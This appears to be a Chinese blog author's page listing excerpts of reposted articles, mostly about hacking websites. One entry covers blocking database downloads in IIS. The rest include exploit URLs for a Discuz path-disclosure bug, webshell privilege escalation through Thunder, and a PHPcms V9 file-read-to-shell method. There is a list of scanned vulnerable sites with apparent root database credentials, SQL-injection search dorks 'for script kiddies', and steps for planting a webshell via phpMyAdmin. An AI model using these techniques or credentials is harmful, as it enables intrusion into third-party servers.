技术
fengling132
这个作者很懒,什么都没留下…
展开
-
用IIS防止mdb数据库被下载
如何防止mdb数据库被下载?本文讨论的是在服务器端禁止mdb格式数据库文件被下载,而不是在数据库中加入防下载表,将数据库名改为含#号的asp、asa等后缀格式。 下面以IIS6.0为例说明如何在服务器端设置禁止下载mdb数据库。新建一记事本文件,里 面不要填写任何内容,将文件名改为NoDownload.dll,拷贝到C:\Windows\System32\(Win2000为C:\WinNT\转载 2012-07-07 22:03:07 · 700 阅读 · 0 评论 -
DZ x2.5 爆路径漏洞
测试exp: http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myrepeats.php http://localhost/install/include/install_lang.php转载 2012-08-23 13:35:56 · 855 阅读 · 0 评论 -
webshell迅雷提权
F4技术小组 www.f4ms.netwebshell地址http://192.168.197.130/dama.asp迅雷默认安装文件夹盘符\Program Files\Thunder Network\Thunder盘符\Program Files\Thunder要修改的两个文件进入Program文件夹getAllurl.htm转载 2012-07-21 18:46:44 · 1062 阅读 · 0 评论 -
PHPcmsV9任意文件读取漏洞拿Shell
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解转载 2012-08-02 21:57:53 · 1516 阅读 · 0 评论 -
发一批 phpcmsV9 系统漏洞mysql
编辑:madman 日期:2012-08-02 分类:最新漏洞 评论:6条评论简介:一批 phpcmsV9 系统漏洞 批量扫描到的mysql 后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。 至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj.com@)!!db—-hu转载 2012-08-02 21:56:36 · 2121 阅读 · 0 评论 -
sql注入词&语法
sql注入关键词脚本小子必看inurl:asp?id=inurl:Article_Print.asp?EnCompHonorBig.asp?id=随便加个数字showproduct.asp?id=随便加个数字 inurl:ManageLogin.aspEnCompHonorBig.asp?id= 随便加个数字inurl: (asp?=数字) inurl: (php?=数转载 2012-07-14 16:07:21 · 13485 阅读 · 0 评论 -
SQL Server数据库常用的T-SQL命令
=============================================================================================================sqlserver显示数据库和表及列名select * from master.dbo.sysdatabases where dbid>4//显示所有转载 2012-07-13 15:25:47 · 806 阅读 · 0 评论 -
ActiveX component can't create object这个错误怎么解决
当运行知羽相册软件、知羽平面软件,双击快捷方式后出现“Run-time error '429' AcriveX component can't create object.”的错误提示时,可能是由于以下原因造成:1、“dao350.dll”文件没注册成功。2、没有安装SQL Server。请分别手工注册 dao350.dll 和 scrrun.dll 两个文件。方法是在“开始”——翻译 2012-07-13 12:47:51 · 42613 阅读 · 1 评论 -
phpMyAdmin 后台拿webshell
(旧的东西 记录下 方便以后xxx..)1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---CREATE TABLE a (cmd text NOT NULL);INSERT转载 2012-08-23 13:35:17 · 750 阅读 · 0 评论